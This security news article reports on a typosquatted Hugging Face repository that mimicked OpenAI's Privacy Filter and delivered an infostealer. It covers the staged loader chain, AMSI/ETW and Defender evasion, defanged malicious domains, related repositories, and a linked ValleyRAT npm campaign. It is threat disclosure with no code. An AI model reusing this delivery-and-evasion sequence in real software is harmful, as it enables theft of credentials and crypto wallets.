### Typosquatting Attack on Hugging Face The malicious repository, named `Open-OSS/privacy-filter`, impersonated **OpenAI**'s legitimate `openai/privacy-filter` model, released last month. It copied the entire description to deceive users into downloading the malicious code. **Hugging Face** has since disabled access to the fake model. **OpenAI** introduced Privacy Filter in April 2026 as a means to detect and redact Personally Identifiable Information (PII) in unstructured text, aiming to enhance privacy and security in applications. ### Technical Details of the Attack "The repository had typosquatted **OpenAI**'s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a `loader.py` file that fetches and executes infostealer malware on Windows machines," the **HiddenLayer** Research Team reported. The malicious project instructs users to clone the repository and execute either a batch script (`start.bat`) for Windows or a Python script (`loader.py`) for Linux or macOS to configure dependencies and initiate the model. Once executed, the Python script initiates malicious code that disables SSL verification, decodes a Base64-encoded URL hosted on **JSON Keeper**, and uses it to extract a command passed to **PowerShell** for execution. Using **JSON Keeper** allows attackers to dynamically switch payloads without altering the repository. The **PowerShell** command downloads a batch script from a remote server (`api.eth-fastscan[.]org`) and launches it using `cmd.exe`. This batch script functions as a second-stage downloader, elevating privileges through a User Account Control (UAC) prompt, configuring **Microsoft Defender Antivirus** exclusions, downloading the next-stage binary from the same domain, and setting up a scheduled task to run a **PowerShell** script that executes the binary. ### Information Stealer Payload Once the scheduled task runs, the malware waits two seconds before deleting itself. The final stage is an information stealer designed to capture screenshots and harvest data from **Discord**, cryptocurrency wallets and extensions, system metadata, files like FileZilla configurations and wallet seed phrases, and web browsers based on **Chromium** and **Gecko**. "Despite using a scheduled task, this stage establishes no persistence: the task is destroyed before any reboot. It is being used as a one-shot SYSTEM-context launcher," **HiddenLayer** explained. The stealer also checks for debuggers and sandboxes, verifies it's not running in a virtual machine, and attempts to disable **Windows Antimalware Scan Interface (AMSI)** and **Event Tracing for Windows (ETW)** to evade detection. The stolen data is exfiltrated in JSON format to the `recargapopular[.]com` domain.  ### Inflated Popularity and Additional Malicious Repositories Before being disabled, the malicious model reached the #1 trending position on **Hugging Face**, with approximately 244,000 downloads and 667 likes within 18 hours, suspected to be artificially inflated. Further analysis revealed six more repositories using a similar Python loader to deploy the stealer: * `anthfu/Bonsai-8B-gguf` * `anthfu/Qwen3.6-35B-A3B-APEX-GGUF` * `anthfu/DeepSeek-V4-Pro` * `anthfu/Qwopus-GLM-18B-Merged-GGUF` * `anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF` * `anthfu/supergemma4-26b-uncensored-gguf-v2` ### Connection to ValleyRAT **HiddenLayer** also found the `api[.]eth-fastscan[.]org` domain serving a different Windows executable (`o0q2l47f.exe`) that beacons to `welovechinatown[.]info`, a command-and-control (C2) server previously used in a campaign involving a malicious npm package named `trevlo` to deliver **ValleyRAT** (aka Winos 4.0). The `trevlo` Node.js library was downloaded over 2,300 times after being published by a user named `titaniumg` on April 4, 2026. The package's postinstall hook silently executes an obfuscated JavaScript loader that spawns a base64-encoded **PowerShell** command, fetching and executing a second-stage **PowerShell** script from attacker-controlled infrastructure, as reported by **Panther**.  That script downloads and runs a **Winos 4.0** stager binary (`CodeRun102.exe`) with full evasion, complete with hidden window execution, Zone Identifier removal, and process detachment. This attack represents a new initial access vector for **ValleyRAT**, a modular remote access trojan typically distributed via phishing emails and search engine optimization (SEO) poisoning. The use of **ValleyRAT** is attributed to the Chinese hacking group **Silver Fox**. "The shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems," **HiddenLayer** concluded.